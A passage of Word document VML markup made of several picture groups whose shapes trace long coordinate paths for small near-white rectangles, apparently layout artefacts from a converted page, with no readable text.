        <v:shape style="position:absolute;left:3010;top:2910;width:130;height:250" coordorigin="3010,2910" coordsize="130,250" path="m3026,2920l3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3026,2920,3027,2920,3027,2920,3027,2920,3027,2920,3027,2920,3027,2920,3027,2920,3028,2920,3028,2920,3028,2920,3028,2920,3029,2920,3029,2920,3029,2920,3029,2920,3030,2920,3030,2920,3030,2920,3031,2920,3031,2920,3032,2920,3032,2920,3032,2920,3033,2920,3033,2920,3034,2920,3034,2920,3035,2920,3036,2920,3036,2920,3037,2920,3037,2920,3038,2920,3039,2920,3039,2920,3040,2920,3041,2920,3042,2920,3043,2920,3043,2920,3044,2920,3045,2920,3046,2920,3047,2920,3048,2920,3049,2920,3050,2920,3051,2920,3052,2920,3053,2920,3054,2920,3056,2920,3057,2920,3058,2920,3059,2920,3061,2920,3062,2920,3063,2920,3065,2920,3066,2920,3068,2920,3069,2920,3071,2920,3072,2920,3074,2920,3076,2920,3077,2920,3079,2920,3081,2920,3083,2920,3085,2920,3087,2920,3089,2920,3091,2920,3093,2920,3095,2920,3097,2920,3099,2920,3101,2920,3103,2920,3106,2920,3108,2920,3110,2920,3113,2920,3115,2920,3118,2920,3120,2920,3123,2920,3126,2920,3128,2920,3131,2920,3134,2920,3137,2920,3140,2920,3143,2920,3146,2920,3146,2920,3146,2920,3146,2920,3146,2920,3146,2920,3146,2920,3146,2920,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2921,3146,2922,3146,2922,3146,2922,3146,2922,3146,2922,3146,2923,3146,2923,3146,2923,3146,2923,3146,2924,3146,2924,3146,2925,3146,2925,3146,2925,3146,2926,3146,2926,3146,2927,3146,2928,3146,2928,3146,2929,3146,2929,3146,2930,3146,2931,3146,2932,3146,2933,3146,2933,3146,2934,3146,2935,3146,2936,3146,2937,3146,2938,3146,2939,3146,2941,3146,2942,3146,2943,3146,2944,3146,2946,3146,2947,3146,2949,3146,2950,3146,2952,3146,2953,3146,2955,3146,2957,3146,2958,3146,2960,3146,2962,3146,2964,3146,2966,3146,2968,3146,2970,3146,2972,3146,2975,3146,2977,3146,2979,3146,2982,3146,2984,3146,2987,3146,2990,3146,2992,3146,2995,3146,2998,3146,3001,3146,3004,3146,3007,3146,3010,3146,3013,3146,3017,3146,3020,3146,3024,3146,3027,3146,3031,3146,3035,3146,3038,3146,3042,3146,3046,3146,3050,3146,3054,3146,3059,3146,3063,3146,3067,3146,3072,3146,3076,3146,3081,3146,3086,3146,3091,3146,3096,3146,3101,3146,3106,3146,3111,3146,3117,3146,3122,3146,3128,3146,3133,3146,3139,3146,3145,3146,3151,3146,3157,3146,3163,3146,3169,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3146,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3145,3176,3144,3176,3144,3176,3144,3176,3144,3176,3144,3176,3144,3176,3143,3176,3143,3176,3143,3176,3143,3176,3143,3176,3142,3176,3142,3176,3142,3176,3141,3176,3141,3176,3141,3176,3140,3176,3140,3176,3140,3176,3139,3176,3139,3176,3138,3176,3138,3176,3137,3176,3137,3176,3136,3176,3136,3176,3135,3176,3134,3176,3134,3176,3133,3176,3132,3176,3132,3176,3131,3176,3130,3176,3129,3176,3129,3176,3128,3176,3127,3176,3126,3176,3125,3176,3124,3176,3123,3176,3122,3176,3121,3176,3120,3176,3119,3176,3118,3176,3117,3176,3116,3176,3114,3176,3113,3176,3112,3176,3110,3176,3109,3176,3108,3176,3106,3176,3105,3176,3103,3176,3102,3176,3100,3176,3099,3176,3097,3176,3095,3176,3094,3176,3092,3176,3090,3176,3088,3176,3086,3176,3084,3176,3083,3176,3081,3176,3079,3176,3076,3176,3074,3176,3072,3176,3070,3176,3068,3176,3065,3176,3063,3176,3061,3176,3058,3176,3056,3176,3053,3176,3051,3176,3048,3176,3045,3176,3043,3176,3040,3176,3037,3176,3034,3176,3031,3176,3029,3176,3026,3176,3026,3176,3026,3176,3026,3176,3026,3176,3026,3176,3026,3176,3026,3176,3026,3176,3026,3176,3026,3175,3026,3175,3026,3175,3026,3175,3026,3175,3026,3175,3026,3175,3026,3175,3026,3175,3026,3175,3026,3175,3026,3174,3026,3174,3026,3174,3026,3174,3026,3173,3026,3173,3026,3173,3026,3173,3026,3172,3026,3172,3026,3172,3026,3171,3026,3171,3026,3170,3026,3170,3026,3169,3026,3169,3026,3168,3026,3167,3026,3167,3026,3166,3026,3165,3026,3164,3026,3164,3026,3163,3026,3162,3026,3161,3026,3160,3026,3159,3026,3158,3026,3157,3026,3156,3026,3154,3026,3153,3026,3152,3026,3150,3026,3149,3026,3148,3026,3146,3026,3144,3026,3143,3026,3141,3026,3140,3026,3138,3026,3136,3026,3134,3026,3132,3026,3130,3026,3128,3026,3126,3026,3124,3026,3121,3026,3119,3026,3117,3026,3114,3026,3112,3026,3109,3026,3106,3026,3104,3026,3101,3026,3098,3026,3095,3026,3092,3026,3089,3026,3086,3026,3083,3026,3079,3026,3076,3026,3072,3026,3069,3026,3065,3026,3062,3026,3058,3026,3054,3026,3050,3026,3046,3026,3042,3026,3037,3026,3033,3026,3029,3026,3024,3026,3020,3026,3015,3026,3010,3026,3005,3026,3000,3026,2995,3026,2990,3026,2985,3026,2980,3026,2974,3026,2969,3026,2963,3026,2957,3026,2951,3026,2945,3026,2939,3026,2933,3026,2927,3026,2920e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:174.500pt;margin-top:199.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3490,3990" coordsize="130,270">
        <v:shape style="position:absolute;left:3490;top:3990;width:130;height:270" coordorigin="3490,3990" coordsize="130,270" path="m3506,4016l3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3506,4016,3507,4016,3507,4016,3507,4016,3507,4016,3507,4016,3507,4016,3507,4016,3508,4016,3508,4016,3508,4016,3508,4016,3508,4016,3509,4016,3509,4016,3509,4016,3509,4016,3510,4016,3510,4016,3510,4016,3511,4016,3511,4016,3511,4016,3512,4016,3512,4016,3513,4016,3513,4016,3514,4016,3514,4016,3515,4016,3515,4016,3516,4016,3516,4016,3517,4016,3518,4016,3518,4016,3519,4016,3520,4016,3520,4016,3521,4016,3522,4016,3523,4016,3524,4016,3524,4016,3525,4016,3526,4016,3527,4016,3528,4016,3529,4016,3530,4016,3531,4016,3532,4016,3533,4016,3535,4016,3536,4016,3537,4016,3538,4016,3540,4016,3541,4016,3542,4016,3544,4016,3545,4016,3547,4016,3548,4016,3550,4016,3551,4016,3553,4016,3554,4016,3556,4016,3558,4016,3559,4016,3561,4016,3563,4016,3565,4016,3567,4016,3569,4016,3571,4016,3573,4016,3575,4016,3577,4016,3579,4016,3581,4016,3584,4016,3586,4016,3588,4016,3591,4016,3593,4016,3596,4016,3598,4016,3601,4016,3603,4016,3606,4016,3609,4016,3611,4016,3614,4016,3617,4016,3620,4016,3623,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4016,3626,4017,3626,4017,3626,4017,3626,4017,3626,4017,3626,4017,3626,4017,3626,4018,3626,4018,3626,4018,3626,4018,3626,4019,3626,4019,3626,4019,3626,4020,3626,4020,3626,4021,3626,4021,3626,4021,3626,4022,3626,4023,3626,4023,3626,4024,3626,4024,3626,4025,3626,4026,3626,4026,3626,4027,3626,4028,3626,4029,3626,4030,3626,4031,3626,4032,3626,4033,3626,4034,3626,4035,3626,4036,3626,4037,3626,4039,3626,4040,3626,4041,3626,4043,3626,4044,3626,4046,3626,4047,3626,4049,3626,4050,3626,4052,3626,4054,3626,4056,3626,4058,3626,4060,3626,4062,3626,4064,3626,4066,3626,4068,3626,4070,3626,4073,3626,4075,3626,4077,3626,4080,3626,4082,3626,4085,3626,4088,3626,4091,3626,4094,3626,4096,3626,4099,3626,4103,3626,4106,3626,4109,3626,4112,3626,4116,3626,4119,3626,4123,3626,4126,3626,4130,3626,4134,3626,4138,3626,4142,3626,4146,3626,4150,3626,4154,3626,4159,3626,4163,3626,4167,3626,4172,3626,4177,3626,4181,3626,4186,3626,4191,3626,4196,3626,4201,3626,4207,3626,4212,3626,4218,3626,4223,3626,4229,3626,4234,3626,4240,3626,4246,3626,4252,3626,4258,3626,4265,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3626,4271,3625,4271,3625,4271,3625,4271,3625,4271,3625,4271,3625,4271,3625,4271,3625,4271,3625,4271,3625,4271,3624,4271,3624,4271,3624,4271,3624,4271,3624,4271,3623,4271,3623,4271,3623,4271,3623,4271,3623,4271,3622,4271,3622,4271,3622,4271,3621,4271,3621,4271,3621,4271,3620,4271,3620,4271,3619,4271,3619,4271,3618,4271,3618,4271,3617,4271,3617,4271,3616,4271,3616,4271,3615,4271,3615,4271,3614,4271,3613,4271,3613,4271,3612,4271,3611,4271,3610,4271,3610,4271,3609,4271,3608,4271,3607,4271,3606,4271,3605,4271,3604,4271,3603,4271,3602,4271,3601,4271,3600,4271,3599,4271,3598,4271,3597,4271,3596,4271,3595,4271,3593,4271,3592,4271,3591,4271,3589,4271,3588,4271,3587,4271,3585,4271,3584,4271,3582,4271,3581,4271,3579,4271,3577,4271,3576,4271,3574,4271,3572,4271,3570,4271,3569,4271,3567,4271,3565,4271,3563,4271,3561,4271,3559,4271,3557,4271,3555,4271,3552,4271,3550,4271,3548,4271,3546,4271,3543,4271,3541,4271,3539,4271,3536,4271,3534,4271,3531,4271,3528,4271,3526,4271,3523,4271,3520,4271,3517,4271,3515,4271,3512,4271,3509,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4271,3506,4270,3506,4270,3506,4270,3506,4270,3506,4270,3506,4270,3506,4269,3506,4269,3506,4269,3506,4268,3506,4268,3506,4268,3506,4267,3506,4267,3506,4267,3506,4266,3506,4266,3506,4265,3506,4265,3506,4264,3506,4263,3506,4263,3506,4262,3506,4261,3506,4261,3506,4260,3506,4259,3506,4258,3506,4257,3506,4256,3506,4255,3506,4254,3506,4253,3506,4252,3506,4251,3506,4250,3506,4249,3506,4247,3506,4246,3506,4245,3506,4243,3506,4242,3506,4240,3506,4238,3506,4237,3506,4235,3506,4233,3506,4231,3506,4230,3506,4228,3506,4226,3506,4224,3506,4221,3506,4219,3506,4217,3506,4215,3506,4212,3506,4210,3506,4207,3506,4205,3506,4202,3506,4199,3506,4196,3506,4194,3506,4191,3506,4188,3506,4185,3506,4181,3506,4178,3506,4175,3506,4171,3506,4168,3506,4164,3506,4161,3506,4157,3506,4153,3506,4149,3506,4145,3506,4141,3506,4137,3506,4133,3506,4129,3506,4124,3506,4120,3506,4115,3506,4110,3506,4106,3506,4101,3506,4096,3506,4091,3506,4086,3506,4080,3506,4075,3506,4070,3506,4064,3506,4058,3506,4053,3506,4047,3506,4041,3506,4035,3506,4029,3506,4022,3506,4016e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:310.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,6210" coordsize="130,250">
        <v:shape style="position:absolute;left:2170;top:6210;width:130;height:250" coordorigin="2170,6210" coordsize="130,250" path="m2185,6222l2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2185,6222,2186,6222,2186,6222,2186,6222,2186,6222,2186,6222,2186,6222,2186,6222,2186,6222,2186,6222,2187,6222,2187,6222,2187,6222,2187,6222,2187,6222,2187,6222,2188,6222,2188,6222,2188,6222,2188,6222,2189,6222,2189,6222,2189,6222,2190,6222,2190,6222,2190,6222,2191,6222,2191,6222,2192,6222,2192,6222,2192,6222,2193,6222,2193,6222,2194,6222,2195,6222,2195,6222,2196,6222,2196,6222,2197,6222,2198,6222,2198,6222,2199,6222,2200,6222,2200,6222,2201,6222,2202,6222,2203,6222,2204,6222,2205,6222,2206,6222,2207,6222,2208,6222,2209,6222,2210,6222,2211,6222,2212,6222,2213,6222,2214,6222,2215,6222,2216,6222,2218,6222,2219,6222,2220,6222,2222,6222,2223,6222,2224,6222,2226,6222,2227,6222,2229,6222,2230,6222,2232,6222,2234,6222,2235,6222,2237,6222,2239,6222,2241,6222,2242,6222,2244,6222,2246,6222,2248,6222,2250,6222,2252,6222,2254,6222,2256,6222,2259,6222,2261,6222,2263,6222,2265,6222,2268,6222,2270,6222,2272,6222,2275,6222,2277,6222,2280,6222,2283,6222,2285,6222,2288,6222,2291,6222,2293,6222,2296,6222,2299,6222,2302,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6222,2305,6223,2305,6223,2305,6223,2305,6223,2305,6223,2305,6223,2305,6223,2305,6224,2305,6224,2305,6224,2305,6224,2305,6224,2305,6225,2305,6225,2305,6225,2305,6226,2305,6226,2305,6227,2305,6227,2305,6228,2305,6228,2305,6229,2305,6229,2305,6230,2305,6230,2305,6231,2305,6232,2305,6233,2305,6233,2305,6234,2305,6235,2305,6236,2305,6237,2305,6238,2305,6239,2305,6240,2305,6241,2305,6242,2305,6243,2305,6245,2305,6246,2305,6247,2305,6249,2305,6250,2305,6252,2305,6253,2305,6255,2305,6256,2305,6258,2305,6260,2305,6262,2305,6264,2305,6266,2305,6268,2305,6270,2305,6272,2305,6274,2305,6276,2305,6279,2305,6281,2305,6283,2305,6286,2305,6289,2305,6291,2305,6294,2305,6297,2305,6300,2305,6303,2305,6306,2305,6309,2305,6312,2305,6315,2305,6318,2305,6322,2305,6325,2305,6329,2305,6332,2305,6336,2305,6340,2305,6344,2305,6348,2305,6352,2305,6356,2305,6360,2305,6365,2305,6369,2305,6374,2305,6378,2305,6383,2305,6388,2305,6392,2305,6397,2305,6402,2305,6408,2305,6413,2305,6418,2305,6424,2305,6429,2305,6435,2305,6441,2305,6446,2305,6452,2305,6458,2305,6465,2305,6471,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2305,6477,2304,6477,2304,6477,2304,6477,2304,6477,2304,6477,2304,6477,2304,6477,2303,6477,2303,6477,2303,6477,2303,6477,2303,6477,2302,6477,2302,6477,2302,6477,2302,6477,2301,6477,2301,6477,2301,6477,2300,6477,2300,6477,2299,6477,2299,6477,2299,6477,2298,6477,2298,6477,2297,6477,2297,6477,2296,6477,2296,6477,2295,6477,2295,6477,2294,6477,2293,6477,2293,6477,2292,6477,2291,6477,2291,6477,2290,6477,2289,6477,2288,6477,2287,6477,2286,6477,2286,6477,2285,6477,2284,6477,2283,6477,2282,6477,2281,6477,2280,6477,2279,6477,2277,6477,2276,6477,2275,6477,2274,6477,2273,6477,2271,6477,2270,6477,2269,6477,2267,6477,2266,6477,2264,6477,2263,6477,2261,6477,2260,6477,2258,6477,2257,6477,2255,6477,2253,6477,2251,6477,2250,6477,2248,6477,2246,6477,2244,6477,2242,6477,2240,6477,2238,6477,2236,6477,2234,6477,2232,6477,2230,6477,2227,6477,2225,6477,2223,6477,2220,6477,2218,6477,2215,6477,2213,6477,2210,6477,2208,6477,2205,6477,2202,6477,2200,6477,2197,6477,2194,6477,2191,6477,2188,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6477,2185,6476,2185,6476,2185,6476,2185,6476,2185,6476,2185,6475,2185,6475,2185,6475,2185,6475,2185,6474,2185,6474,2185,6474,2185,6473,2185,6473,2185,6472,2185,6472,2185,6471,2185,6471,2185,6470,2185,6470,2185,6469,2185,6468,2185,6468,2185,6467,2185,6466,2185,6465,2185,6464,2185,6463,2185,6463,2185,6462,2185,6461,2185,6459,2185,6458,2185,6457,2185,6456,2185,6455,2185,6453,2185,6452,2185,6451,2185,6449,2185,6448,2185,6446,2185,6445,2185,6443,2185,6441,2185,6439,2185,6438,2185,6436,2185,6434,2185,6432,2185,6430,2185,6428,2185,6425,2185,6423,2185,6421,2185,6418,2185,6416,2185,6413,2185,6411,2185,6408,2185,6405,2185,6403,2185,6400,2185,6397,2185,6394,2185,6391,2185,6388,2185,6384,2185,6381,2185,6378,2185,6374,2185,6371,2185,6367,2185,6363,2185,6359,2185,6355,2185,6352,2185,6347,2185,6343,2185,6339,2185,6335,2185,6330,2185,6326,2185,6321,2185,6317,2185,6312,2185,6307,2185,6302,2185,6297,2185,6292,2185,6287,2185,6281,2185,6276,2185,6270,2185,6265,2185,6259,2185,6253,2185,6247,2185,6241,2185,6235,2185,6229,2185,6222e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:336.500pt;margin-top:470.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6730,9410" coordsize="130,270">
        <v:shape style="position:absolute;left:6730;top:9410;width:130;height:270" coordorigin="6730,9410" coordsize="130,270" path="m6747,9434l6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6747,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6748,9434,6749,9434,6749,9434,6749,9434,6749,9434,6749,9434,6749,9434,6750,9434,6750,9434,6750,9434,6750,9434,6750,9434,6751,9434,6751,9434,6751,9434,6752,9434,6752,9434,6752,9434,6753,9434,6753,9434,6753,9434,6754,9434,6754,9434,6755,9434,6755,9434,6756,9434,6756,9434,6757,9434,6757,9434,6758,9434,6759,9434,6759,9434,6760,9434,6761,9434,6761,9434,6762,9434,6763,9434,6764,9434,6764,9434,6765,9434,6766,9434,6767,9434,6768,9434,6769,9434,6770,9434,6771,9434,6772,9434,6773,9434,6774,9434,6775,9434,6776,9434,6777,9434,6779,9434,6780,9434,6781,9434,6783,9434,6784,9434,6785,9434,6787,9434,6788,9434,6790,9434,6791,9434,6793,9434,6794,9434,6796,9434,6798,9434,6799,9434,6801,9434,6803,9434,6805,9434,6807,9434,6808,9434,6810,9434,6812,9434,6814,9434,6817,9434,6819,9434,6821,9434,6823,9434,6825,9434,6828,9434,6830,9434,6832,9434,6835,9434,6837,9434,6840,9434,6842,9434,6845,9434,6847,9434,6850,9434,6853,9434,6856,9434,6859,9434,6862,9434,6864,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9434,6867,9435,6867,9435,6867,9435,6867,9435,6867,9435,6867,9436,6867,9436,6867,9436,6867,9436,6867,9437,6867,9437,6867,9437,6867,9438,6867,9438,6867,9439,6867,9439,6867,9440,6867,9440,6867,9441,6867,9441,6867,9442,6867,9443,6867,9443,6867,9444,6867,9445,6867,9446,6867,9447,6867,9448,6867,9448,6867,9449,6867,9450,6867,9452,6867,9453,6867,9454,6867,9455,6867,9456,6867,9458,6867,9459,6867,9460,6867,9462,6867,9463,6867,9465,6867,9466,6867,9468,6867,9470,6867,9472,6867,9473,6867,9475,6867,9477,6867,9479,6867,9481,6867,9483,6867,9486,6867,9488,6867,9490,6867,9493,6867,9495,6867,9498,6867,9500,6867,9503,6867,9506,6867,9508,6867,9511,6867,9514,6867,9517,6867,9520,6867,9523,6867,9527,6867,9530,6867,9533,6867,9537,6867,9540,6867,9544,6867,9548,6867,9552,6867,9556,6867,9559,6867,9564,6867,9568,6867,9572,6867,9576,6867,9581,6867,9585,6867,9590,6867,9594,6867,9599,6867,9604,6867,9609,6867,9614,6867,9619,6867,9624,6867,9630,6867,9635,6867,9641,6867,9646,6867,9652,6867,9658,6867,9664,6867,9670,6867,9676,6867,9682,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6867,9689,6866,9689,6866,9689,6866,9689,6866,9689,6866,9689,6866,9689,6866,9689,6865,9689,6865,9689,6865,9689,6865,9689,6864,9689,6864,9689,6864,9689,6864,9689,6863,9689,6863,9689,6863,9689,6862,9689,6862,9689,6861,9689,6861,9689,6861,9689,6860,9689,6860,9689,6859,9689,6859,9689,6858,9689,6857,9689,6857,9689,6856,9689,6856,9689,6855,9689,6854,9689,6854,9689,6853,9689,6852,9689,6851,9689,6850,9689,6850,9689,6849,9689,6848,9689,6847,9689,6846,9689,6845,9689,6844,9689,6843,9689,6842,9689,6841,9689,6840,9689,6839,9689,6837,9689,6836,9689,6835,9689,6834,9689,6832,9689,6831,9689,6830,9689,6828,9689,6827,9689,6825,9689,6824,9689,6822,9689,6821,9689,6819,9689,6817,9689,6816,9689,6814,9689,6812,9689,6810,9689,6808,9689,6806,9689,6804,9689,6802,9689,6800,9689,6798,9689,6796,9689,6794,9689,6792,9689,6790,9689,6787,9689,6785,9689,6783,9689,6780,9689,6778,9689,6775,9689,6773,9689,6770,9689,6767,9689,6765,9689,6762,9689,6759,9689,6756,9689,6753,9689,6750,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9688,6747,9688,6747,9688,6747,9688,6747,9688,6747,9688,6747,9688,6747,9687,6747,9687,6747,9687,6747,9687,6747,9687,6747,9686,6747,9686,6747,9686,6747,9685,6747,9685,6747,9684,6747,9684,6747,9683,6747,9683,6747,9682,6747,9682,6747,9681,6747,9681,6747,9680,6747,9679,6747,9678,6747,9678,6747,9677,6747,9676,6747,9675,6747,9674,6747,9673,6747,9672,6747,9671,6747,9670,6747,9669,6747,9668,6747,9666,6747,9665,6747,9664,6747,9662,6747,9661,6747,9659,6747,9658,6747,9656,6747,9655,6747,9653,6747,9651,6747,9649,6747,9647,6747,9645,6747,9643,6747,9641,6747,9639,6747,9637,6747,9635,6747,9632,6747,9630,6747,9628,6747,9625,6747,9622,6747,9620,6747,9617,6747,9614,6747,9611,6747,9608,6747,9605,6747,9602,6747,9599,6747,9596,6747,9593,6747,9589,6747,9586,6747,9582,6747,9579,6747,9575,6747,9571,6747,9567,6747,9563,6747,9559,6747,9555,6747,9551,6747,9546,6747,9542,6747,9537,6747,9533,6747,9528,6747,9523,6747,9519,6747,9514,6747,9509,6747,9503,6747,9498,6747,9493,6747,9487,6747,9482,6747,9476,6747,9470,6747,9465,6747,9459,6747,9453,6747,9446,6747,9440,6747,9434e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:336.500pt;margin-top:520.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6730,10410" coordsize="130,270">
        <v:shape style="position:absolute;left:6730;top:10410;width:130;height:270" coordorigin="6730,10410" coordsize="130,270" path="m6747,10439l6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6749,10439,6749,10439,6749,10439,6749,10439,6749,10439,6749,10439,6750,10439,6750,10439,6750,10439,6750,10439,6750,10439,6751,10439,6751,10439,6751,10439,6752,10439,6752,10439,6752,10439,6753,10439,6753,10439,6753,10439,6754,10439,6754,10439,6755,10439,6755,10439,6756,10439,6756,10439,6757,10439,6757,10439,6758,10439,6759,10439,6759,10439,6760,10439,6761,10439,6761,10439,6762,10439,6763,10439,6764,10439,6764,10439,6765,10439,6766,10439,6767,10439,6768,10439,6769,10439,6770,10439,6771,10439,6772,10439,6773,10439,6774,10439,6775,10439,6776,10439,6777,10439,6779,10439,6780,10439,6781,10439,6783,10439,6784,10439,6785,10439,6787,10439,6788,10439,6790,10439,6791,10439,6793,10439,6794,10439,6796,10439,6798,10439,6799,10439,6801,10439,6803,10439,6805,10439,6807,10439,6808,10439,6810,10439,6812,10439,6814,10439,6817,10439,6819,10439,6821,10439,6823,10439,6825,10439,6828,10439,6830,10439,6832,10439,6835,10439,6837,10439,6840,10439,6842,10439,6845,10439,6847,10439,6850,10439,6853,10439,6856,10439,6859,10439,6862,10439,6864,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10440,6867,10440,6867,10440,6867,10440,6867,10440,6867,10440,6867,10440,6867,10440,6867,10440,6867,10441,6867,10441,6867,10441,6867,10441,6867,10442,6867,10442,6867,10442,6867,10443,6867,10443,6867,10443,6867,10444,6867,10444,6867,10445,6867,10445,6867,10446,6867,10446,6867,10447,6867,10448,6867,10448,6867,10449,6867,10450,6867,10450,6867,10451,6867,10452,6867,10453,6867,10454,6867,10455,6867,10456,6867,10457,6867,10458,6867,10459,6867,10461,6867,10462,6867,10463,6867,10464,6867,10466,6867,10467,6867,10469,6867,10470,6867,10472,6867,10474,6867,10475,6867,10477,6867,10479,6867,10481,6867,10483,6867,10485,6867,10487,6867,10489,6867,10491,6867,10493,6867,10496,6867,10498,6867,10501,6867,10503,6867,10506,6867,10508,6867,10511,6867,10514,6867,10517,6867,10520,6867,10523,6867,10526,6867,10529,6867,10532,6867,10536,6867,10539,6867,10542,6867,10546,6867,10550,6867,10553,6867,10557,6867,10561,6867,10565,6867,10569,6867,10573,6867,10577,6867,10582,6867,10586,6867,10591,6867,10595,6867,10600,6867,10605,6867,10610,6867,10615,6867,10620,6867,10625,6867,10630,6867,10635,6867,10641,6867,10646,6867,10652,6867,10658,6867,10664,6867,10670,6867,10676,6867,10682,6867,10688,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6866,10694,6866,10694,6866,10694,6866,10694,6866,10694,6866,10694,6866,10694,6865,10694,6865,10694,6865,10694,6865,10694,6864,10694,6864,10694,6864,10694,6864,10694,6863,10694,6863,10694,6863,10694,6862,10694,6862,10694,6861,10694,6861,10694,6861,10694,6860,10694,6860,10694,6859,10694,6859,10694,6858,10694,6857,10694,6857,10694,6856,10694,6856,10694,6855,10694,6854,10694,6854,10694,6853,10694,6852,10694,6851,10694,6850,10694,6850,10694,6849,10694,6848,10694,6847,10694,6846,10694,6845,10694,6844,10694,6843,10694,6842,10694,6841,10694,6840,10694,6839,10694,6837,10694,6836,10694,6835,10694,6834,10694,6832,10694,6831,10694,6830,10694,6828,10694,6827,10694,6825,10694,6824,10694,6822,10694,6821,10694,6819,10694,6817,10694,6816,10694,6814,10694,6812,10694,6810,10694,6808,10694,6806,10694,6804,10694,6802,10694,6800,10694,6798,10694,6796,10694,6794,10694,6792,10694,6790,10694,6787,10694,6785,10694,6783,10694,6780,10694,6778,10694,6775,10694,6773,10694,6770,10694,6767,10694,6765,10694,6762,10694,6759,10694,6756,10694,6753,10694,6750,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10693,6747,10693,6747,10693,6747,10693,6747,10693,6747,10693,6747,10692,6747,10692,6747,10692,6747,10691,6747,10691,6747,10691,6747,10690,6747,10690,6747,10689,6747,10689,6747,10688,6747,10688,6747,10687,6747,10687,6747,10686,6747,10685,6747,10685,6747,10684,6747,10683,6747,10682,6747,10681,6747,10681,6747,10680,6747,10679,6747,10678,6747,10677,6747,10675,